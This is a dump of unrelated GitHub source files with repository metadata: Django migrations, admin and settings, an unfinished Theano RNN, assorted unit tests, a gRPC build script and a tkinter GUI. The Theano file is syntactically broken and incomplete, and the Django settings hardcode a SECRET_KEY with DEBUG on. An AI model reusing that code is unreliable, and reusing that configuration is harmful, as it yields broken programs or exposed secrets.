"alnum_prop": 0.6556676811362059,
"repo_name": "google/pigweed",
"id": "1e5e0f7e93b2953421325adfa66c45244ed2c2aa",
"size": "19313",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "pw_software_update/py/pw_software_update/generate_test_bundle.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "8654"
},
{
"name": "C",
"bytes": "487991"
},
{
"name": "C++",
"bytes": "6119052"
},
{
"name": "CMake",
"bytes": "288698"
},
{
"name": "CSS",
"bytes": "4820"
},
{
"name": "Go",
"bytes": "18932"
},
{
"name": "HTML",
"bytes": "1194"
},
{
"name": "Java",
"bytes": "327548"
},
{
"name": "JavaScript",
"bytes": "12482"
},
{
"name": "Jinja",
"bytes": "2467"
},
{
"name": "Python",
"bytes": "3578966"
},
{
"name": "Rust",
"bytes": "645"
},
{
"name": "SCSS",
"bytes": "1382"
},
{
"name": "Shell",
"bytes": "22974"
},
{
"name": "Smarty",
"bytes": "692"
},
{
"name": "Starlark",
"bytes": "489444"
},
{
"name": "TypeScript",
"bytes": "235169"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
from django.db import models, migrations
import shortuuidfield.fields
from django.conf import settings
class Migration(migrations.Migration):
dependencies = [
('accounts', '0001_initial'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Contact',
fields=[
('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
('uuid', shortuuidfield.fields.ShortUUIDField(unique=True, max_length=22, editable=False, blank=True)),
('first_name', models.CharField(max_length=30)),
('last_name', models.CharField(max_length=30)),
('role', models.CharField(max_length=20)),
('phone', models.CharField(max_length=20)),
('email', models.EmailField(max_length=75)),
('created_on', models.DateField(auto_now_add=True)),
('account', models.ForeignKey(to='accounts.Account')),
('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name_plural': 'contacts',
},
bases=(models.Model,),
),
]
|
{
"content_hash": "fe123ddc08970b6a379c925bdac2981d",
"timestamp": "",
"source": "github",
"line_count": 35,
"max_line_length": 119,
"avg_line_length": 38.08571428571429,
"alnum_prop": 0.5753938484621155,
"repo_name": "tabdon/crmeasyapp",
"id": "112d2b4e454a5068cc7a29888b196a906e2b51de",
"size": "1357",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "crmapp/contacts/migrations/0001_initial.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "7268"
},
{
"name": "JavaScript",
"bytes": "6240"
},
{
"name": "Python",
"bytes": "35582"
}
],
"symlink_target": ""
}
|
"""
This module is to define how TimeStamp model is represented in the Admin site
It also registers the model to be shown in the admin site
.. seealso:: :class:`..models.TimeStamp`
"""
from django.contrib import admin
from .models import TimeStamp
class FilterUserAdmin(admin.ModelAdmin):
"""
Makes the timestamps of one user not visible to others unless for a superuser
"""
def save_model(self, request, obj, form, change):
if getattr(obj, 'user', None) is None: #Assign user only the first time #if obj.user == None:
obj.user = request.user
obj.save()
def get_queryset(self, request):
qs = super(FilterUserAdmin, self).get_queryset(request)
#qs = admin.ModelAdmin.queryset(self, request)
if request.user.is_superuser:
return qs
return qs.filter(user=request.user)
def has_change_permission(self, request, obj=None):
if not obj:
# the changelist itself
return True # So they can see the change list page
return obj.user == request.user or request.user.is_superuser
class TimeStampAdmin(FilterUserAdmin):
"""
This is configuration of TimeStamp model is admin page
This inherits class FilterUserAdmin
.. seealso:: :class:`FilterUserAdmin`
"""
list_display = ('time_stamp','user') # Fields to show in the listing
list_filter = ['user'] # Enables to se timeStamps of any single user
def has_add_permission(self, request):
"""
Disables addition of timeStamps from the admin page
"""
return False
def get_readonly_fields(self, request, obj=None):
"""
Disables editing in admin page
"""
if obj: # editing an existing object
return self.readonly_fields + ('time_stamp', 'user')
return self.readonly_fields
def has_delete_permission(self, request, obj=None):
"""
Disable deletion of rcords in admin page
"""
return False
admin.site.register(TimeStamp,TimeStampAdmin) # Registers the TimeStamp Model with TimeStampAdmin setting in the Admin site
|
{
"content_hash": "d4b118410817d9a05fb28f97c94a320a",
"timestamp": "",
"source": "github",
"line_count": 66,
"max_line_length": 125,
"avg_line_length": 32.86363636363637,
"alnum_prop": 0.6454587367450438,
"repo_name": "zandegran/django-timeStamp",
"id": "a39d78970a2b5428929cac47bbcd677dcd4fd411",
"size": "2169",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "timeStamps/admin.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "14073"
}
],
"symlink_target": ""
}
|
import numpy as np
import theano
import theano.tensor as T
class OutputLayer:
def __init__(self, n_in, n_out, activation, name):
self.n_in=n_in
self.n_out=n_out
W_init= np.asarray(np.random.uniform(size=(n_in, n_out),
low=-.01, high=.01),
dtype=theano.config.floatX)
self.W_out = theano.shared(value=W_init, name='W_out_{}'.format(name))
by_init = np.zeros((n_out,), dtype=theano.config.floatX)
self.by = theano.shared(value=by_init, name='by_{}'.format(name))
self.params=[self.W_out,self.by]
def process_input(self, indata):
return self.activation(T.dot(indata, self.W_out) + self.by)
def get_params(self):
return self.params
class HiddenLayer:
def __init__(self, n_in, n_out, activation, name):
self.n_in=n_in
self.n_out=n_out
W_init= np.asarray(np.random.uniform(size=(n_in, n_out),
low=-.01, high=.01),
dtype=theano.config.floatX)
self.W_hid = theano.shared(value=W_init, name='W_hid_{}'.format(name))
b_init = np.zeros((n_out,), dtype=theano.config.floatX)
self.bh = theano.shared(value=b_init, name='bh_{}'.format(name))
W_init= np.asarray(np.random.uniform(size=(n_out, n_out),
low=-.01, high=.01),
dtype=theano.config.floatX)
self.W_rec = theano.shared(value=W_init, name='W_rec_{}'.format(name))
hrec_init = np.zeros((n_out,), dtype=theano.config.floatX)
self.hrec0 = theano.shared(value=hrec_init, name='hrec_{}'.format(name))
#TODO: hrec0 also a paramter to be learnt
self.params=[self.W_rec,self.W_hid,self.bh]
def process_input(self, indata, h_tm1):
h_t = self.activation(T.dot(indata, self.W_hid) + \
T.dot(h_tm1, self.W_rec) + self.bh)
return h_t
def get_params(self):
return self.params
def get_init_state(self):
return hrec0
class RNNMultiOut:
def __init__(self, n_in, n_hid, n_out, n_groups):
self.n_in=n_in
self.n_hid=n_hid
self.n_out=n_out
self.h_l=HiddenLayer(n_in, n_hid, T.nnet.sigmoid, 'h1')
self.o_ls=[ OutputLayer(n_hid, n_out, T.nnet.softmax, 'o{}'.format(i) for i in xrange(n_groups) ]
x=T.matrix()
y=T.matrix()
g=T.vector()
#### function for processing a time step
# recurrent function (using tanh activation function) and linear output
# activation function
def step(x_t, h_tm1):
h_t = self.h_l.process_input(x_t, h_tm1)
y_ts= [ self.o_ls[i].process_input(h_t) for i in xrange(n_groups) ]
return h_t, y_t[0], y_t[1]
# the hidden state `h` for the entire sequence, and the output for the
# entire sequence `y` (first dimension is always time)
[self.h, self.y0_pred, self.y1_pred], _ = theano.scan(step,
sequences=self.x,
outputs_info=[self.h_l.get_init_state(), None, None])
def load_data(data_fname):
pass
def main():
loss1=
if __name__ == '__main__':
main()
|
{
"content_hash": "820054476613e59b27787ebf0ae3a768",
"timestamp": "",
"source": "github",
"line_count": 99,
"max_line_length": 105,
"avg_line_length": 35.484848484848484,
"alnum_prop": 0.5138058639339596,
"repo_name": "anoopkunchukuttan/theano-rnn",
"id": "d5444401caf07126bc0693bdd8608d378ebacc41",
"size": "3513",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "test.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "100797"
}
],
"symlink_target": ""
}
|
import os,sys
PROJECT_DIR = os.path.dirname(__file__)
sys.path.append(os.path.split(os.path.split(PROJECT_DIR)[0])[0])
DEBUG = True
TEMPLATE_DEBUG = DEBUG
ADMINS = (
# ('Your Name', 'your_email@example.com'),
)
MANAGERS = ADMINS
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.
'NAME': os.path.join(PROJECT_DIR,'db'), # Or path to database file if using sqlite3.
'USER': '', # Not used with sqlite3.
'PASSWORD': '', # Not used with sqlite3.
'HOST': '', # Set to empty string for localhost. Not used with sqlite3.
'PORT': '', # Set to empty string for default. Not used with sqlite3.
}
}
# Local time zone for this installation. Choices can be found here:
# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name
# although not all choices may be available on all operating systems.
# On Unix systems, a value of None will cause Django to use the same
# timezone as the operating system.
# If running in a Windows environment this must be set to the same as your
# system time zone.
TIME_ZONE = 'America/Chicago'
# Language code for this installation. All choices can be found here:
# http://www.i18nguy.com/unicode/language-identifiers.html
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
# If you set this to False, Django will make some optimizations so as not
# to load the internationalization machinery.
USE_I18N = True
# If you set this to False, Django will not format dates, numbers and
# calendars according to the current locale
USE_L10N = True
# Absolute filesystem path to the directory that will hold user-uploaded files.
# Example: "/home/media/media.lawrence.com/media/"
MEDIA_ROOT = ''
# URL that handles the media served from MEDIA_ROOT. Make sure to use a
# trailing slash.
# Examples: "http://media.lawrence.com/media/", "http://example.com/media/"
MEDIA_URL = ''
# Absolute path to the directory static files should be collected to.
# Don't put anything in this directory yourself; store your static files
# in apps' "static/" subdirectories and in STATICFILES_DIRS.
# Example: "/home/media/media.lawrence.com/static/"
STATIC_ROOT = ''
# URL prefix for static files.
# Example: "http://media.lawrence.com/static/"
STATIC_URL = '/static/'
# URL prefix for admin static files -- CSS, JavaScript and images.
# Make sure to use a trailing slash.
# Examples: "http://foo.com/static/admin/", "/static/admin/".
ADMIN_MEDIA_PREFIX = '/static/admin/'
# Additional locations of static files
STATICFILES_DIRS = (
# Put strings here, like "/home/html/static" or "C:/www/django/static".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
# List of finder classes that know how to find static files in
# various locations.
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
# 'django.contrib.staticfiles.finders.DefaultStorageFinder',
)
# Make this unique, and don't share it with anybody.
SECRET_KEY = 'p7t2@in067h#pf-2l2%2wa5=^n-tk56k3i(syf2mlu%&3@o&eo'
# List of callables that know how to import templates from various sources.
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
# 'django.template.loaders.eggs.Loader',
)
MIDDLEWARE_CLASSES = (
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
ROOT_URLCONF = 'project.urls'
TEMPLATE_DIRS = (
# Put strings here, like "/home/html/django_templates" or "C:/www/django/templates".
# Always use forward slashes, even on Windows.
# Don't forget to use absolute paths, not relative paths.
)
INSTALLED_APPS = (
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'dynamo'
# Uncomment the next line to enable the admin:
# 'django.contrib.admin',
# Uncomment the next line to enable admin documentation:
# 'django.contrib.admindocs',
)
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'handlers': {
'mail_admins': {
'level': 'ERROR',
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
}
}
|
{
"content_hash": "afd5b58cb7265e5ef916a7c2ea486889",
"timestamp": "",
"source": "github",
"line_count": 151,
"max_line_length": 122,
"avg_line_length": 34.19867549668874,
"alnum_prop": 0.6841595662277304,
"repo_name": "glenrobertson/django-dynamo",
"id": "528e2eab0248fb02bc68df80e73097c4a304aba1",
"size": "5204",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/project/settings.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "76518"
},
{
"name": "Shell",
"bytes": "4681"
}
],
"symlink_target": ""
}
|
from google.cloud import retail_v2alpha
def sample_tune_model():
# Create a client
client = retail_v2alpha.ModelServiceClient()
# Initialize request argument(s)
request = retail_v2alpha.TuneModelRequest(
name="name_value",
)
# Make the request
operation = client.tune_model(request=request)
print("Waiting for operation to complete...")
response = operation.result()
# Handle the response
print(response)
# [END retail_v2alpha_generated_ModelService_TuneModel_sync]
|
{
"content_hash": "c6f6e33d019e944f35a605a88b4ed265",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 60,
"avg_line_length": 22.869565217391305,
"alnum_prop": 0.6958174904942965,
"repo_name": "googleapis/python-retail",
"id": "7d47091931980b227a531e043e35a16230530ab9",
"size": "1905",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "samples/generated_samples/retail_v2alpha_generated_model_service_tune_model_sync.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2050"
},
{
"name": "Python",
"bytes": "7420556"
},
{
"name": "Shell",
"bytes": "30660"
}
],
"symlink_target": ""
}
|
""" Python utility to build opt and counters benchmarks """
import bm_constants
import argparse
import subprocess
import multiprocessing
import os
import shutil
def _args():
argp = argparse.ArgumentParser(description='Builds microbenchmarks')
argp.add_argument(
'-b',
'--benchmarks',
nargs='+',
choices=bm_constants._AVAILABLE_BENCHMARK_TESTS,
default=bm_constants._AVAILABLE_BENCHMARK_TESTS,
help='Which benchmarks to build')
argp.add_argument(
'-j',
'--jobs',
type=int,
default=multiprocessing.cpu_count(),
help='How many CPUs to dedicate to this task')
argp.add_argument(
'-n',
'--name',
type=str,
help='Unique name of this build. To be used as a handle to pass to the other bm* scripts'
)
argp.add_argument('--counters', dest='counters', action='store_true')
argp.add_argument('--no-counters', dest='counters', action='store_false')
argp.set_defaults(counters=True)
args = argp.parse_args()
assert args.name
return args
def _make_cmd(cfg, benchmarks, jobs):
return ['make'] + benchmarks + ['CONFIG=%s' % cfg, '-j', '%d' % jobs]
def build(name, benchmarks, jobs, counters):
shutil.rmtree('bm_diff_%s' % name, ignore_errors=True)
subprocess.check_call(['git', 'submodule', 'update'])
try:
subprocess.check_call(_make_cmd('opt', benchmarks, jobs))
if counters:
subprocess.check_call(_make_cmd('counters', benchmarks, jobs))
except subprocess.CalledProcessError, e:
subprocess.check_call(['make', 'clean'])
subprocess.check_call(_make_cmd('opt', benchmarks, jobs))
if counters:
subprocess.check_call(_make_cmd('counters', benchmarks, jobs))
os.rename(
'bins',
'bm_diff_%s' % name,)
if __name__ == '__main__':
args = _args()
build(args.name, args.benchmarks, args.jobs, args.counters)
|
{
"content_hash": "cd367091b6a4b26e068cb0e266d7c5a4",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 97,
"avg_line_length": 30.78125,
"alnum_prop": 0.6203045685279188,
"repo_name": "deepaklukose/grpc",
"id": "a4cd61707d3876257ed724c4781cda672d45cc3e",
"size": "2574",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tools/profiling/microbenchmarks/bm_diff/bm_build.py",
"mode": "33261",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "14215"
},
{
"name": "C",
"bytes": "6720351"
},
{
"name": "C#",
"bytes": "1432469"
},
{
"name": "C++",
"bytes": "2008381"
},
{
"name": "CMake",
"bytes": "471360"
},
{
"name": "DTrace",
"bytes": "147"
},
{
"name": "JavaScript",
"bytes": "373818"
},
{
"name": "M4",
"bytes": "42520"
},
{
"name": "Makefile",
"bytes": "879728"
},
{
"name": "Objective-C",
"bytes": "270343"
},
{
"name": "PHP",
"bytes": "291471"
},
{
"name": "Protocol Buffer",
"bytes": "94937"
},
{
"name": "PureBasic",
"bytes": "147"
},
{
"name": "Python",
"bytes": "1356223"
},
{
"name": "Ruby",
"bytes": "661539"
},
{
"name": "Shell",
"bytes": "34711"
},
{
"name": "Swift",
"bytes": "3486"
}
],
"symlink_target": ""
}
|
import unittest
import MyPack.wrap as wrap
class TestDict(unittest.TestCase):
def test_return(self):
import numpy as np
a = np.arange(10, dtype=np.float32)
b = a.copy()*-1
self.assertEqual(45, wrap.test(a))
for i,j in zip(a,b):
self.assertEqual(i, j)
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "0a28400b84c5019886b2fc3ab422fd40",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 43,
"avg_line_length": 20,
"alnum_prop": 0.5722222222222222,
"repo_name": "POFK/utilTool",
"id": "40c5db8df2bde14dbb5144c316a3cddf24e6f0b5",
"size": "397",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "python/setuppy_exam/tests/module1_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Awk",
"bytes": "2002"
},
{
"name": "C",
"bytes": "452437"
},
{
"name": "CSS",
"bytes": "28266"
},
{
"name": "Erlang",
"bytes": "1147"
},
{
"name": "HTML",
"bytes": "3490"
},
{
"name": "JavaScript",
"bytes": "1064"
},
{
"name": "Makefile",
"bytes": "7222"
},
{
"name": "Perl",
"bytes": "40891"
},
{
"name": "Python",
"bytes": "399043"
},
{
"name": "Ruby",
"bytes": "5631"
},
{
"name": "Shell",
"bytes": "9717"
},
{
"name": "Vim script",
"bytes": "2832275"
},
{
"name": "Visual Basic",
"bytes": "94759"
}
],
"symlink_target": ""
}
|
from django.utils.module_loading import autodiscover_modules
from . import base
def autodiscover():
autodiscover_modules('social', register_to=base)
default_app_config = 'socializr.apps.SocializrConfig'
|
{
"content_hash": "bb9594931df79f6c89459208f1515710",
"timestamp": "",
"source": "github",
"line_count": 10,
"max_line_length": 60,
"avg_line_length": 21.2,
"alnum_prop": 0.7783018867924528,
"repo_name": "albertoconnor/django-socializr",
"id": "69593e763a8806ab9a30e6c850a60027e51245cb",
"size": "213",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "socializr/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "20364"
}
],
"symlink_target": ""
}
|
from kubeflow.fairing.preprocessors.base import BasePreProcessor
def test_checking_reqs_file_found_use_case_with_input_files():
input_files = ["foo", "bar", "/foo/bar", "requirements.txt"]
preprocessor = BasePreProcessor(input_files=input_files)
assert preprocessor.is_requirements_txt_file_present()
def test_checking_reqs_file_found_use_case_with_output_map():
output_map = {
"foo": "/app/bar",
"/foo/bar": "/app/requirements.txt"
}
preprocessor = BasePreProcessor(output_map=output_map)
assert preprocessor.is_requirements_txt_file_present()
def test_checking_reqs_file_not_found_use_case_with_input_files():
input_files = ["foo", "bar", "/foo/bar", "/foo/requirements.txt"]
preprocessor = BasePreProcessor(input_files=input_files)
assert not preprocessor.is_requirements_txt_file_present()
def test_checking_reqs_file_not_found_use_case_with_output_map():
output_map = {
"foo": "/app/bar",
"/foo/bar": "/app/foo/requirements.txt"
}
preprocessor = BasePreProcessor(output_map=output_map)
assert not preprocessor.is_requirements_txt_file_present()
|
{
"content_hash": "fe611c731190aa1171b3da9b799ae1e9",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 69,
"avg_line_length": 36.96774193548387,
"alnum_prop": 0.6980802792321117,
"repo_name": "kubeflow/fairing",
"id": "12b82f91d0ff375ccee98c4cdb0012b8b537c53a",
"size": "1146",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/unit/preprocessors/test_base_preprocessor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Dockerfile",
"bytes": "2103"
},
{
"name": "Jsonnet",
"bytes": "2440311"
},
{
"name": "Jupyter Notebook",
"bytes": "1573"
},
{
"name": "Python",
"bytes": "523314"
},
{
"name": "Shell",
"bytes": "439"
}
],
"symlink_target": ""
}
|
"""The tests for the Google Wifi platform."""
import unittest
from unittest.mock import patch, Mock
from datetime import datetime, timedelta
import requests_mock
from homeassistant import core as ha
from homeassistant.setup import setup_component
import homeassistant.components.google_wifi.sensor as google_wifi
from homeassistant.const import STATE_UNKNOWN
from homeassistant.util import dt as dt_util
from tests.common import get_test_home_assistant, assert_setup_component
NAME = 'foo'
MOCK_DATA = ('{"software": {"softwareVersion":"initial",'
'"updateNewVersion":"initial"},'
'"system": {"uptime":86400},'
'"wan": {"localIpAddress":"initial", "online":true,'
'"ipAddress":true}}')
MOCK_DATA_NEXT = ('{"software": {"softwareVersion":"next",'
'"updateNewVersion":"0.0.0.0"},'
'"system": {"uptime":172800},'
'"wan": {"localIpAddress":"next", "online":false,'
'"ipAddress":false}}')
MOCK_DATA_MISSING = ('{"software": {},'
'"system": {},'
'"wan": {}}')
class TestGoogleWifiSetup(unittest.TestCase):
"""Tests for setting up the Google Wifi sensor platform."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
@requests_mock.Mocker()
def test_setup_minimum(self, mock_req):
"""Test setup with minimum configuration."""
resource = '{}{}{}'.format(
'http://', google_wifi.DEFAULT_HOST, google_wifi.ENDPOINT)
mock_req.get(resource, status_code=200)
assert setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'google_wifi',
'monitored_conditions': ['uptime']
}
})
assert_setup_component(1, 'sensor')
@requests_mock.Mocker()
def test_setup_get(self, mock_req):
"""Test setup with full configuration."""
resource = '{}{}{}'.format(
'http://', 'localhost', google_wifi.ENDPOINT)
mock_req.get(resource, status_code=200)
assert setup_component(self.hass, 'sensor', {
'sensor': {
'platform': 'google_wifi',
'host': 'localhost',
'name': 'Test Wifi',
'monitored_conditions': ['current_version',
'new_version',
'uptime',
'last_restart',
'local_ip',
'status']
}
})
assert_setup_component(6, 'sensor')
class TestGoogleWifiSensor(unittest.TestCase):
"""Tests for Google Wifi sensor platform."""
def setUp(self):
"""Set up things to be run when tests are started."""
self.hass = get_test_home_assistant()
with requests_mock.Mocker() as mock_req:
self.setup_api(MOCK_DATA, mock_req)
def tearDown(self):
"""Stop everything that was started."""
self.hass.stop()
def setup_api(self, data, mock_req):
"""Set up API with fake data."""
resource = '{}{}{}'.format(
'http://', 'localhost', google_wifi.ENDPOINT)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
mock_req.get(resource, text=data, status_code=200)
conditions = google_wifi.MONITORED_CONDITIONS.keys()
self.api = google_wifi.GoogleWifiAPI("localhost", conditions)
self.name = NAME
self.sensor_dict = dict()
for condition, cond_list in google_wifi.MONITORED_CONDITIONS.items():
sensor = google_wifi.GoogleWifiSensor(
self.api, self.name, condition)
name = '{}_{}'.format(self.name, condition)
units = cond_list[1]
icon = cond_list[2]
self.sensor_dict[condition] = {
'sensor': sensor,
'name': name,
'units': units,
'icon': icon
}
def fake_delay(self, ha_delay):
"""Fake delay to prevent update throttle."""
hass_now = dt_util.utcnow()
shifted_time = hass_now + timedelta(seconds=ha_delay)
self.hass.bus.fire(ha.EVENT_TIME_CHANGED, {ha.ATTR_NOW: shifted_time})
def test_name(self):
"""Test the name."""
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
test_name = self.sensor_dict[name]['name']
assert test_name == sensor.name
def test_unit_of_measurement(self):
"""Test the unit of measurement."""
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
assert \
self.sensor_dict[name]['units'] == sensor.unit_of_measurement
def test_icon(self):
"""Test the icon."""
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
assert self.sensor_dict[name]['icon'] == sensor.icon
@requests_mock.Mocker()
def test_state(self, mock_req):
"""Test the initial state."""
self.setup_api(MOCK_DATA, mock_req)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
if name == google_wifi.ATTR_LAST_RESTART:
assert '1969-12-31 00:00:00' == sensor.state
elif name == google_wifi.ATTR_UPTIME:
assert 1 == sensor.state
elif name == google_wifi.ATTR_STATUS:
assert 'Online' == sensor.state
else:
assert 'initial' == sensor.state
@requests_mock.Mocker()
def test_update_when_value_is_none(self, mock_req):
"""Test state gets updated to unknown when sensor returns no data."""
self.setup_api(None, mock_req)
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
assert sensor.state is None
@requests_mock.Mocker()
def test_update_when_value_changed(self, mock_req):
"""Test state gets updated when sensor returns a new status."""
self.setup_api(MOCK_DATA_NEXT, mock_req)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
if name == google_wifi.ATTR_LAST_RESTART:
assert '1969-12-30 00:00:00' == sensor.state
elif name == google_wifi.ATTR_UPTIME:
assert 2 == sensor.state
elif name == google_wifi.ATTR_STATUS:
assert 'Offline' == sensor.state
elif name == google_wifi.ATTR_NEW_VERSION:
assert 'Latest' == sensor.state
elif name == google_wifi.ATTR_LOCAL_IP:
assert STATE_UNKNOWN == sensor.state
else:
assert 'next' == sensor.state
@requests_mock.Mocker()
def test_when_api_data_missing(self, mock_req):
"""Test state logs an error when data is missing."""
self.setup_api(MOCK_DATA_MISSING, mock_req)
now = datetime(1970, month=1, day=1)
with patch('homeassistant.util.dt.now', return_value=now):
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
self.fake_delay(2)
sensor.update()
assert STATE_UNKNOWN == sensor.state
def test_update_when_unavailable(self):
"""Test state updates when Google Wifi unavailable."""
self.api.update = Mock('google_wifi.GoogleWifiAPI.update',
side_effect=self.update_side_effect())
for name in self.sensor_dict:
sensor = self.sensor_dict[name]['sensor']
sensor.update()
assert sensor.state is None
def update_side_effect(self):
"""Mock representation of update function."""
self.api.data = None
self.api.available = False
|
{
"content_hash": "793de3b9c3fe19e21134796122e77b21",
"timestamp": "",
"source": "github",
"line_count": 221,
"max_line_length": 78,
"avg_line_length": 39.425339366515836,
"alnum_prop": 0.5478021347411913,
"repo_name": "jnewland/home-assistant",
"id": "ee0cf3b0658653e5445a89239205627d7fcd2dfc",
"size": "8713",
"binary": false,
"copies": "8",
"ref": "refs/heads/ci",
"path": "tests/components/google_wifi/test_sensor.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "1175"
},
{
"name": "Dockerfile",
"bytes": "1081"
},
{
"name": "Python",
"bytes": "15240512"
},
{
"name": "Ruby",
"bytes": "745"
},
{
"name": "Shell",
"bytes": "17862"
}
],
"symlink_target": ""
}
|
import tkinter as tk
import constants
import circle
import utils
class simulationGUI(tk.Frame):
def __init__(self, parent, beObj):
const = constants.simulationWindow
self.beObj = beObj
self.canvas = tk.Canvas(parent, bg=const.background,
width=const.width, height=const.height)
self.canvasSizes = (self.canvas.winfo_reqwidth(),
self.canvas.winfo_reqheight())
self.placeTheCircles()
self.canvas.grid(row=const.rowOrder, column=const.colOrder,
sticky=const.sticky)
self.canvas.bind("<Button-1>", self.click)
# For the interactive gui
def click(self, event):
print("clicked at", event.x, event.y)
self.beObj.increment()
print(self.beObj)
def addCircle(self, obj):
x, y = obj.pos
r = obj.radius
self.canvas.create_oval(x - r, y - r, x + r, y + r,
outline="red", fill="green")
def placeTheCircles(self):
placed, idx = [circle.Circle(self.canvasSizes)], 1
while idx < constants.bubbles.numberOfCircles:
newCircle = circle.Circle(self.canvasSizes)
isOK = True
for next in placed:
if utils.circlesIsOverlapCheck(next, newCircle):
isOK = False
break
if isOK:
self.addCircle(newCircle)
placed.append(newCircle)
idx += 1
|
{
"content_hash": "58fa21420cac78a55c0f43417f52c65c",
"timestamp": "",
"source": "github",
"line_count": 46,
"max_line_length": 71,
"avg_line_length": 33.17391304347826,
"alnum_prop": 0.5504587155963303,
"repo_name": "dekespo/EVSTimulator",
"id": "5ab0f7062b160c65c896f7d3ae0744dce2bba592",
"size": "1526",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "gui/simulation.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "1843"
},
{
"name": "Python",
"bytes": "13846"
},
{
"name": "Shell",
"bytes": "44"
}
],
"symlink_target": ""
}
|
import re
import mock
from oslo_utils import units
from oslo_vmware import exceptions as vexc
from oslo_vmware.objects import datastore as ds_obj
from nova import exception
from nova import test
from nova.tests.unit.virt.vmwareapi import fake
from nova.virt.vmwareapi import ds_util
class DsUtilTestCase(test.NoDBTestCase):
def setUp(self):
super(DsUtilTestCase, self).setUp()
self.session = fake.FakeSession()
self.flags(api_retry_count=1, group='vmware')
fake.reset()
def tearDown(self):
super(DsUtilTestCase, self).tearDown()
fake.reset()
def test_get_datacenter_ref(self):
with mock.patch.object(self.session, '_call_method') as call_method:
ds_util.get_datacenter_ref(self.session, "datacenter")
call_method.assert_called_once_with(
self.session.vim,
"FindByInventoryPath",
self.session.vim.service_content.searchIndex,
inventoryPath="datacenter")
def test_file_delete(self):
def fake_call_method(module, method, *args, **kwargs):
self.assertEqual('DeleteDatastoreFile_Task', method)
name = kwargs.get('name')
self.assertEqual('[ds] fake/path', name)
datacenter = kwargs.get('datacenter')
self.assertEqual('fake-dc-ref', datacenter)
return 'fake_delete_task'
with test.nested(
mock.patch.object(self.session, '_wait_for_task'),
mock.patch.object(self.session, '_call_method',
fake_call_method)
) as (_wait_for_task, _call_method):
ds_path = ds_obj.DatastorePath('ds', 'fake/path')
